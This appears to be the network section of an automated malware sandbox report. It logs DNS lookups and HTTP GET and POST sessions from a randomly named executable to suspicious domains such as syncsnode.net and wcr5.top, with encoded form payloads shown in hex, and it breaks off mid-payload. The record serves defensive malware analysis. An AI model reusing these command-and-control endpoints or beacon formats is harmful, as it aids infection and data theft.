                                                                                                                                                                                                                                    Oct 11, 2024 15:09:25.958239079 CEST5987553192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:26.159014940 CEST53598751.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:42.822177887 CEST6016453192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:42.870667934 CEST53601641.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:56.386550903 CEST6184053192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:56.862648010 CEST53618401.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:10.182609081 CEST5531053192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:10.199460983 CEST53553101.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:23.387417078 CEST5896853192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:23.776401043 CEST53589681.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:37.385656118 CEST6462953192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:37.594892025 CEST53646291.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:50.994834900 CEST4972653192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.009046078 CEST53497261.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.871416092 CEST5411653192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.885049105 CEST53541161.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.180419922 CEST5278153192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.219836950 CEST53527811.1.1.1192.168.2.5
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:33.651104927 CEST5339053192.168.2.51.1.1.1
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:33.717602015 CEST53533901.1.1.1192.168.2.5

                                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:25.958239079 CEST192.168.2.51.1.1.10xcb0fStandard query (0)www.wcr5.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:42.822177887 CEST192.168.2.51.1.1.10x83bcStandard query (0)www.syncsnode.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:56.386550903 CEST192.168.2.51.1.1.10x5ee3Standard query (0)www.facaicloud.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:10.182609081 CEST192.168.2.51.1.1.10x4c71Standard query (0)www.nibcorp.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:23.387417078 CEST192.168.2.51.1.1.10x962dStandard query (0)www.93wxd.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:37.385656118 CEST192.168.2.51.1.1.10x2847Standard query (0)www.meramhaliyikama.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:50.994834900 CEST192.168.2.51.1.1.10x6a19Standard query (0)www.n-paylity.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.871416092 CEST192.168.2.51.1.1.10x5ca0Standard query (0)www.supox.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.180419922 CEST192.168.2.51.1.1.10xbaaeStandard query (0)www.5711337.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:33.651104927 CEST192.168.2.51.1.1.10x9a24Standard query (0)www.master7.spaceA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:26.159014940 CEST1.1.1.1192.168.2.50xcb0fNo error (0)www.wcr5.topwcr5.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:26.159014940 CEST1.1.1.1192.168.2.50xcb0fNo error (0)wcr5.top154.23.184.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:42.870667934 CEST1.1.1.1192.168.2.50x83bcNo error (0)www.syncsnode.net172.67.218.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:42.870667934 CEST1.1.1.1192.168.2.50x83bcNo error (0)www.syncsnode.net104.21.59.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:56.862648010 CEST1.1.1.1192.168.2.50x5ee3No error (0)www.facaicloud.top74.48.31.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:10.199460983 CEST1.1.1.1192.168.2.50x4c71No error (0)www.nibcorp.xyznibcorp.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:10.199460983 CEST1.1.1.1192.168.2.50x4c71No error (0)nibcorp.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:10.199460983 CEST1.1.1.1192.168.2.50x4c71No error (0)nibcorp.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:23.776401043 CEST1.1.1.1192.168.2.50x962dNo error (0)www.93wxd.top93wxd.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:23.776401043 CEST1.1.1.1192.168.2.50x962dNo error (0)93wxd.top206.119.82.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:37.594892025 CEST1.1.1.1192.168.2.50x2847No error (0)www.meramhaliyikama.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:37.594892025 CEST1.1.1.1192.168.2.50x2847No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:37.594892025 CEST1.1.1.1192.168.2.50x2847No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.009046078 CEST1.1.1.1192.168.2.50x6a19No error (0)www.n-paylity.shop104.21.42.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:10:51.009046078 CEST1.1.1.1192.168.2.50x6a19No error (0)www.n-paylity.shop172.67.210.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:04.885049105 CEST1.1.1.1192.168.2.50x5ca0No error (0)www.supox.site162.0.225.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.219836950 CEST1.1.1.1192.168.2.50xbaaeNo error (0)www.5711337.xyz103.249.106.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:33.717602015 CEST1.1.1.1192.168.2.50x9a24No error (0)www.master7.space199.59.243.227A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                                    • www.wcr5.top
                                                                                                                                                                                                                                    • www.syncsnode.net
                                                                                                                                                                                                                                    • www.facaicloud.top
                                                                                                                                                                                                                                    • www.nibcorp.xyz
                                                                                                                                                                                                                                    • www.93wxd.top
                                                                                                                                                                                                                                    • www.meramhaliyikama.xyz
                                                                                                                                                                                                                                    • www.n-paylity.shop
                                                                                                                                                                                                                                    • www.supox.site
                                                                                                                                                                                                                                    • www.5711337.xyz

                                                                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.2.549958154.23.184.95803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:26.181927919 CEST550OUTGET /0fcg/?KteDo=fX0Hm8kxa&BHNhDJjp=hJPFsW9wVXXSmVQNX9HyPUqpnWaGwoAwUQqBAOekg/iA3H1k+2o0va3fZiXrpa/qEBgAqlFBPzvmzQvG7thcdV/HiwU/gazVS6QU6A3e7YzcCqqFBxHno6Fx/WWCMuQjEQ== HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.wcr5.top
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:27.764803886 CEST312INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:09:26 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Content-Length: 148
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    ETag: "66a87b7e-94"
                                                                                                                                                                                                                                    Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    1192.168.2.549986172.67.218.106803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:42.887197971 CEST813OUTPOST /t97r/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.syncsnode.net
                                                                                                                                                                                                                                    Origin: http://www.syncsnode.net
                                                                                                                                                                                                                                    Referer: http://www.syncsnode.net/t97r/
                                                                                                                                                                                                                                    Content-Length: 209
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 53 57 53 63 79 41 44 42 63 4c 44 5a 64 36 65 66 2b 47 69 2f 43 4f 58 73 38 70 6c 4c 4a 44 50 48 33 35 34 4c 74 36 49 74 51 4f 34 66 69 49 30 6a 43 68 30 6f 4c 48 6c 38 4e 56 43 68 5a 6b 30 73 44 41 73 70 4d 32 62 43 48 6d 72 59 69 6f 67 72 6c 76 68 45 4a 73 44 50 51 66 56 51 52 54 4d 4d 71 4a 44 45 6c 48 4b 78 72 77 41 47 2b 52 71 41 6d 6c 6a 37 51 47 70 66 73 33 4d 79 59 66 67 4d 4e 59 56 49 63 4e 57 56 31 4e 34 30 37 72 57 6a 6b 44 6f 49 63 2f 49 55 49 39 66 6f 66 32 59 36 2f 37 62 33 71 36 6b 59 47 36 36 5a 68 43 4d 32 42 67 39 4f 33 6d 4b 6d 68 56 31 52 5a 58 53 31 68 4c 35 71 52 4b 77 3d
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=SWScyADBcLDZd6ef+Gi/COXs8plLJDPH354Lt6ItQO4fiI0jCh0oLHl8NVChZk0sDAspM2bCHmrYiogrlvhEJsDPQfVQRTMMqJDElHKxrwAG+RqAmlj7QGpfs3MyYfgMNYVIcNWV1N407rWjkDoIc/IUI9fof2Y6/7b3q6kYG66ZhCM2Bg9O3mKmhV1RZXS1hL5qRKw=
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:43.699394941 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:09:43 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tkU0Iri%2FA2obOuL5Skx9aOk9wBsAH1jtOvgEAIjBWi7soU%2Fi%2BtlRT7NaQZ1CnwJWBUau9QgIDCljZeAtRLZCvSzkQmOtig76YHjToEeax4klazQzyNwseG6ssIRVyPw0nki0Xg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8d0f1611b9478c7d-EWR
                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    Data Raw: 32 64 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: 2d0dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:43.699641943 CEST213INData Raw: 13 ef f2 f5 32 37 c5 ee 7d dd d1 29 0d 4a 48 9a 2b c8 17 c5 fc a2 b4 dd ed d6 f0 b4 e4 9b db f7 a0 6d 40 5e aa b0 f3 ed 9d a7 a3 34 67 70 34 a3 47 09 dd 19 a0 11 af 71 89 55 0b ca e3 b0 4f 14 b3 ab b2 6c 9e e7 8d d1 8c c1 21 4a c6 5e 6d 7a 3a 64
                                                                                                                                                                                                                                    Data Ascii: 27})JH+m@^4gp4GqUOl!J^mz:d=f_;vmaDr%O?Wc+`vN3+ cD]'4v70uB.0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    2192.168.2.549987172.67.218.106803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:45.433125973 CEST833OUTPOST /t97r/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.syncsnode.net
                                                                                                                                                                                                                                    Origin: http://www.syncsnode.net
                                                                                                                                                                                                                                    Referer: http://www.syncsnode.net/t97r/
                                                                                                                                                                                                                                    Content-Length: 229
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 53 57 53 63 79 41 44 42 63 4c 44 5a 63 62 75 66 79 42 2b 2f 45 75 58 76 79 4a 6c 4c 44 6a 4f 76 33 35 38 4c 74 2b 77 62 54 38 4d 66 68 71 38 6a 46 54 63 6f 49 48 6c 38 47 31 43 6f 64 6b 30 37 44 41 6f 4c 4d 33 6e 43 48 6d 2f 59 69 70 51 72 6c 63 4a 48 4b 63 44 4e 63 2f 56 57 65 7a 4d 4d 71 4a 44 45 6c 48 65 62 72 77 49 47 2b 68 61 41 6b 45 6a 34 54 47 70 63 6c 58 4d 79 4a 50 67 49 4e 59 56 36 63 49 32 7a 31 50 77 30 37 72 47 6a 6b 79 6f 4c 53 50 4a 66 57 4e 65 67 62 55 52 51 35 4c 62 43 76 74 56 38 58 70 4b 51 70 55 68 63 62 43 31 6d 6b 47 6d 65 78 47 39 6d 49 6e 7a 63 37 6f 70 61 50 64 6c 34 65 73 66 59 32 7a 36 64 55 75 53 33 30 4d 4b 32 44 51 76 71
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=SWScyADBcLDZcbufyB+/EuXvyJlLDjOv358Lt+wbT8Mfhq8jFTcoIHl8G1Codk07DAoLM3nCHm/YipQrlcJHKcDNc/VWezMMqJDElHebrwIG+haAkEj4TGpclXMyJPgINYV6cI2z1Pw07rGjkyoLSPJfWNegbURQ5LbCvtV8XpKQpUhcbC1mkGmexG9mInzc7opaPdl4esfY2z6dUuS30MK2DQvq
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:46.252962112 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:09:46 GMT
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uhcv0QSTuFkwz8VSce9PuNag8PzZG09W8PLiPGo2ELJ9BaqMNGec36dDVkH3WaXfMqYwzwhoKK68CvkXx5lOJMSEnt3feDXexfWyR09uIqZoyOVgYqM%2BRQEhPCjiofGJYnl3zQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                    CF-RAY: 8d0f16219ca02394-EWR
                                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                    Data Raw: 32 63 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 6d 8b db 38 10 fe 1e b8 ff 30 f5 52 68 21 8e ed ac c3 1d b6 63 38 da 3b 7a 50 da 85 2e 94 fb 28 5b 63 4b 54 d1 e8 a4 89 9d f4 d7 1f 72 36 fb 56 09 f4 32 1a cd cb f3 0c d3 bc f9 f8 f5 c3 fd bf 77 7f 81 e2 83 69 57 4d dc 20 f0 d9 e0 3e 51 a8 47 c5 55 91 e7 6f 93 f8 84 42 b6 ab e6 80 2c c0 8a 03 ee 93 49 e3 ec c8 73 02 3d 59 46 cb fb 64 d6 92 d5 5e e2 a4 7b 4c 97 cb 1a b4 d5 ac 85 49 43 2f 0c ee 8b 35 04 e5 b5 fd 91 32 a5 83 e6 bd a5 04 b2 76 d5 b0 66 83 2d 94 79 09 5f 88 e1 6f 3a 5a f9 db aa c9 2e f2 26 7b f0 df 91 3c 5f 23 ec c9 90 af e0 a6 2c cb 1a 0e c2 8f da 56 79 3d 90 e5 0a 2c f9 83 30 50 94 ee 94 6d 73 77 82 3f bd 16 66 0d 9f d0 4c c8 ba 17 6b 08 c2 86 34 a0 d7 43 0d cf 92 ad a1 13 fd 8f d1 c7 00 d2 ab 8b 61 18 ea 88 82 d4 d3 2b 7c c4 91 a9 86 83 b6 e9 0b 1b 49 0b 71 3c ff c0 78 e2 54 18 3d da 0a 7a b4 8c be 86 05 a3 ea 8f 3c 77 a7 6b 0a a9 c1 81 2b 48 cb 8b d0 51 d0 ac c9 56 a2 0b 64 8e 8c 35 30 b9 0a 6e a3 97 45 75 97 bf 8d b1 c1 c3 68 54 71 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: 2c5dTm80Rh!c8;zP.([cKTr6V2wiWM >QGUoB,Is=YFd^{LIC/52vf-y_o:Z.&{<_#,Vy=,0Pmsw?fLk4Ca+|Iq<xT=z<wk+HQVd50nEuhTqDPbUF[|"Zt##-T4 "i}c#F=KY`7MUI=3H/y/SRj;Vbp={4uoP#V"/Rn;;A %
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:46.253051996 CEST214INData Raw: 32 37 c5 ee 7d dd d1 29 0d 4a 48 9a 2b c8 17 c5 fc a2 b4 dd ed d6 f0 b4 e4 9b db f7 a0 6d 40 5e aa b0 f3 ed 9d a7 a3 34 67 70 34 a3 47 09 dd 19 a0 11 af 71 89 55 0b ca e3 b0 4f 14 b3 ab b2 6c 9e e7 8d d1 8c c1 21 4a c6 5e 6d 7a 3a 64 e8 3d f9 d4
                                                                                                                                                                                                                                    Data Ascii: 27})JH+m@^4gp4GqUOl!J^mz:d=f_;vmaDr%O?Wc+`vN3+ cD]'4v70uBb.0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    3192.168.2.549988172.67.218.106803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:09:47.976398945 CEST1850OUTPOST /t97r/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.syncsnode.net
                                                                                                                                                                                                                                    Origin: http://www.syncsnode.net
                                                                                                                                                                                                                                    Referer: http://www.syncsnode.net/t97r/
                                                                                                                                                                                                                                    Content-Length: 1245
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 53 57 53 63 79 41 44 42 63 4c 44 5a 63 62 75 66 79 42 2b 2f 45 75 58 76 79 4a 6c 4c 44 6a 4f 76 33 35 38 4c 74 2b 77 62 54 38 30 66 68 66 6f 6a 43 45 6f 6f 4a 48 6c 38 4c 56 43 6c 64 6b 31 35 44 41 51 50 4d 33 71 35 48 6b 48 59 69 50 45 72 73 4e 4a 48 64 73 44 4e 55 66 56 58 52 54 4e 4f 71 4a 54 41 6c 48 4f 62 72 77 49 47 2b 6a 43 41 33 31 6a 34 56 47 70 66 73 33 4d 2b 59 66 67 67 4e 59 4d 4e 63 49 36 6a 31 37 38 30 37 4c 32 6a 33 77 41 4c 51 76 4a 64 58 4e 66 6d 62 55 4e 4c 35 4c 48 34 76 6f 70 53 58 70 79 51 35 41 55 62 47 78 5a 52 36 32 71 6b 6c 47 35 66 66 54 71 36 6b 61 68 63 43 50 35 43 52 4e 72 4f 2f 54 2b 45 5a 76 48 6b 32 61 65 2b 44 48 36 6a 63 70 57 75 35 2b 59 55 46 5a 65 4d 6d 39 76 75 53 2f 4e 31 38 71 46 68 5a 48 2b 51 4b 51 35 32 4b 67 49 5a 63 77 56 72 75 39 61 52 74 2f 71 30 78 4b 74 78 70 79 46 2b 4b 62 69 7a 44 57 44 4e 4a 30 61 6e 35 6a 6c 71 6c 37 63 70 49 6d 6f 30 55 56 70 4b 6c 54 4c 74 79 64 6b 59 55 4a 6e 66 30 66 71 42 6c 7a 61 68 52 5a 73 6c 4f [TRUNCATED]
